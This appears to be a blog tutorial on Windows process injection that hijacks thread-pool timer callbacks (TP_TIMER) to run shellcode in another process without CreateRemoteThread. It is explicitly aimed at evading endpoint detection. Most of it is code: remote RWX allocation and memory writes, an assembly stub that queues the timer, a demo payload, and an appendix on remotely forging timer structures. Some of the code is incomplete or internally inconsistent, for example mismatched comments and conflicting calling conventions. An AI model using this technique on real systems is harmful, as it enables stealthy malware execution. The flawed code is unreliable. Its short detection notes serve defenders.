CreateRemoteThread without CreateRemoteThread

Modern endpoint detection systems monitor for direct thread creation via APIs like CreateRemoteThread, flagging new threads as potential injection attempts. That makes classic injection noisy and easily caught in process audits or behavioral analytics.

This post demonstrates an alternative: hijacking the Windows thread pool’s timer callbacks (TP_TIMER) to execute shellcode in a remote process. The code runs as a legitimate asynchronous callback, blending into the system’s normal activity.

Shootout the the Alon Leviev for the original PoolParty: Safebreach

The detection problem

EDRs and security tools often hook or monitor thread pool APIs indirectly, but they rarely flag callbacks fired by kernel-scheduled timers. Traditional injection creates visible threads; TP_TIMER abuse schedules execution through the pool’s existing machinery, avoiding explicit thread starts.

// Classic approach - easily flagged
HANDLE hThread = CreateRemoteThread(hProcess, NULL, 0, (LPTHREAD_START_ROUTINE)shellcodeAddr, NULL, 0, NULL);

With TP_TIMER, no new thread handle appears in tool output like Process Explorer or thread enumeration APIs. The callback invokes your code seamlessly within the pool worker.

The TP_TIMER approach

Windows thread pools manage timers via TP_TIMER objects, which trigger user-defined callbacks when due. These callbacks execute in the target process’s context, invoked by the kernel scheduler.

The key: remotely queue a timer whose callback points directly to injected shellcode. When the timer fires, the pool dispatches your payload as a standard PTP_TIMER_CALLBACK, without user-mode thread creation.

Why it works:

Execution happens via kernel-managed callbacks, not explicit threads.
No CreateRemoteThread call enters API monitors or ETW traces.
Blends with legitimate async operations like file I/O timers or network events.
Evades heuristics focused on thread start addresses or creation patterns.

Windows thread pool internals

Thread pools centralize async work on Windows, with TP_TIMER handling periodic or one-shot callbacks. Internally:

Each timer object stores a callback pointer (PTP_TIMER_CALLBACK) and period/due time.
The kernel queues timers to the pool; workers invoke callbacks in process context.
Callbacks follow stdcall convention: VOID CALLBACK TimerCallback(PTP_CALLBACK_INSTANCE Instance, PVOID Context, PTP_TIMER Timer).

Abuse this by allocating shellcode that matches the signature, then setting it as the timer’s callback from the remote process.

PTP_TIMER hTimer = CreateThreadpoolTimer(TimerCallback, Context, NULL);
FILETIME dueTime = {0};  // Fire immediately
SetThreadpoolTimer(hTimer, &dueTime, 0, 0);

Here, TimerCallback is your shellcode address. The pool handles invocation without user intervention.

Step-by-step implementation

This example outlines the injection flow: allocate shellcode in the target, establish remote execution to queue the timer, and let the system fire it. Assumes x64 Windows; adjust for 32-bit.

Note: Code presented for authorized security research and educational use only. Test in isolated VMs.

1. Open target and allocate memory

Gain access and prepare RWX space for shellcode.

#include <windows.h>
#include <pch.h>  // Or relevant headers

HANDLE hProcess = OpenProcess(
    PROCESS_ALL_ACCESS, FALSE, targetPid
);

if (!hProcess) {
    printf("[!] Failed to open process: %lu\n", GetLastError());
    return 1;
}

SIZE_T shellcodeSize = sizeof(shellcode);  // Your payload bytes
LPVOID remoteShellcode = VirtualAllocEx(
    hProcess, NULL, shellcodeSize,
    MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE
);

if (!remoteShellcode) {
    printf("[!] VirtualAllocEx failed: %lu\n", GetLastError());
    CloseHandle(hProcess);
    return 1;
}

// Write shellcode
SIZE_T bytesWritten;
BOOL success = WriteProcessMemory(
    hProcess, remoteShellcode, shellcode, shellcodeSize, &bytesWritten
);

if (!success || bytesWritten != shellcodeSize) {
    printf("[!] WriteProcessMemory failed\n");
    VirtualFreeEx(hProcess, remoteShellcode, 0, MEM_RELEASE);
    CloseHandle(hProcess);
    return 1;
}

printf("[+] Shellcode allocated and written at 0x%p\n", remoteShellcode);

This plants the payload. Shellcode must conform to PTP_TIMER_CALLBACK: ignore params, perform actions, exit cleanly.

2. Queue the remote timer

Directly creating TP_TIMER from the injector fails—APIs require target context. Use a bootstrap primitive (e.g., NtQueueApcThread for existing threads) to run a small stub that queues the timer.

Stub payload (remote-executed first):

// Stub to queue timer - ~100 bytes, position-independent
__declspec(naked) void QueueTimerStub() {
    __asm {
        // Resolve APIs via hash or GetProcAddress (simplified)
        mov rcx, [ntdll_base]  // Pre-injected or resolved
        // ... hash-based GetProcAddress for CreateThreadpoolTimer, SetThreadpoolTimer

        // Shellcode addr from param or fixed offset
        lea rdx, [remoteShellcode]  // Or passed via APC context

        // Create timer with shellcode as callback
        call CreateThreadpoolTimer  // (callback=remoteShellcode, context=NULL, reserved=NULL)

        mov r8, rax  // hTimer
        // Due time: immediate
        xor rax, rax
        mov [dueTime], rax
        mov [dueTime+8], rax

        // Set and start
        call SetThreadpoolTimer  // (hTimer, &dueTime, period=0, tolerance=0)

        // Clean up or exit
        ret
    }
}

Inject and execute the stub via APC or similar. Once run, it queues the timer pointing to your main shellcode.

3. Execution and cleanup

The kernel fires the timer shortly after queuing. Your shellcode executes in a pool worker thread—perform actions like spawning processes or loading DLLs.

Wait via injector (optional):

// From injector: wait a beat for callback
Sleep(100);  // Tune based on due time

// Clean up if needed
VirtualFreeEx(hProcess, remoteShellcode, 0, MEM_RELEASE);
CloseHandle(hProcess);

printf("[+] Injection complete - check target for execution\n");

Full demo would include stub injection details; focus here is the TP_TIMER pivot.

Callback requirements

Shellcode must match PTP_TIMER_CALLBACK:

Signature: VOID (PTP_CALLBACK_INSTANCE, PVOID, PTP_TIMER)
Convention: Fastcall (rcx=instance, rdx=context, r8=timer)
No return value; clean stack.

Simple calc shellcode example (MessageBox for demo):

// Assembly snippet - assemble to bytes
mov r9, 0x0  // MB_OK
lea r8, [strTitle]  // "Injected"
lea rdx, [strText]  // "TP_TIMER works!"
lea rcx, [user32]  // hWnd=NULL
call MessageBoxA
ret

// Strings and hModule resolved at runtime or baked in
BYTE shellcode[] = { 0x4D, 0x31, 0xC9, /* ... full bytes ... */ };

Test locally first: compile as DLL, export callback, queue timer.

Considerations

This bypasses thread-creation monitors but not all defenses.

Strengths: No thread handles; low API footprint post-bootstrap.
Weaknesses: Requires initial remote exec; pool callbacks loggable via advanced tracing.
Detection notes: Hook CreateThreadpoolTimer/SetThreadpoolTimer; scan callback addrs for anomalies.

In short: evasion of one heuristic does not equal invisibility.

Disclaimer: Intended for authorized security research and educational purposes only.

Appendix

Internals—NTAPI, Object Handles, and True “No-Primitive” Threadpool Timer Injection

For technically advanced readers interested in the deeper form of TP_TIMER abuse—fully remote injection with no bootstrap primitive or shellcode runner thread—here’s a glimpse “under the hood”.

Direct Manipulation of Threadpool Timer Objects

While userland APIs like CreateThreadpoolTimer or even classic APC stub runners require code execution in the target, it’s possible to remotely schedule arbitrary callback execution purely by manipulating the target’s threadpool objects and using low-level Windows NT APIs:

Object Enumeration:
The injector identifies and duplicates (via DuplicateHandle, NtQueryInformationProcess, NtQueryObject) existing object handles of type:
- "Process" (code/data access)
- "TpWorkerFactory" (thread pool worker factory)
- "IRTimer" (internal timer objects)
Threadpool Structures:
Using internal layout knowledge (reverse engineered from Windows symbols), a complete FULL_TP_TIMER structure is created locally with the callback pointer set to the desired shellcode and then allocated and written into the remote process via VirtualAllocEx and WriteProcessMemory.
Linking with the Worker Pool:
The structure’s pool pointer is rebased to the factory’s actual pool address obtained through NtQueryInformationWorkerFactory.
Queue Links and Timer Trees:
The timer’s start/end links are patched into the remote process’s timer queue (writing pointer fixes via WriteProcessMemory).
Remote Kernel Signaling:
Finally, the payload is dispatched by calling: NtSetTimer2(hTimerQ, &due_time, NULL, &params); This NTAPI call schedules the crafted timer object for execution, causing the system threadpool to invoke your payload asynchronously—without any explicit thread creation or stub execution in userland.

No Userland Primitive—What’s the Catch?

This approach requires deep knowledge of Windows internal structures (undocumented in the public API).
It is inherently version-dependent: changes in struct layouts or access policies on future Windows builds could break the method.
All actions are performed remotely from the injector, and no shellcode runner or code stub is needed in the target except for the payload itself.
This avenue does still leave (advanced) forensic artifacts: manipulated timer lists, irregular or malicious callback addresses within the pool, and potential log entries if kernel debug instrumentation is present.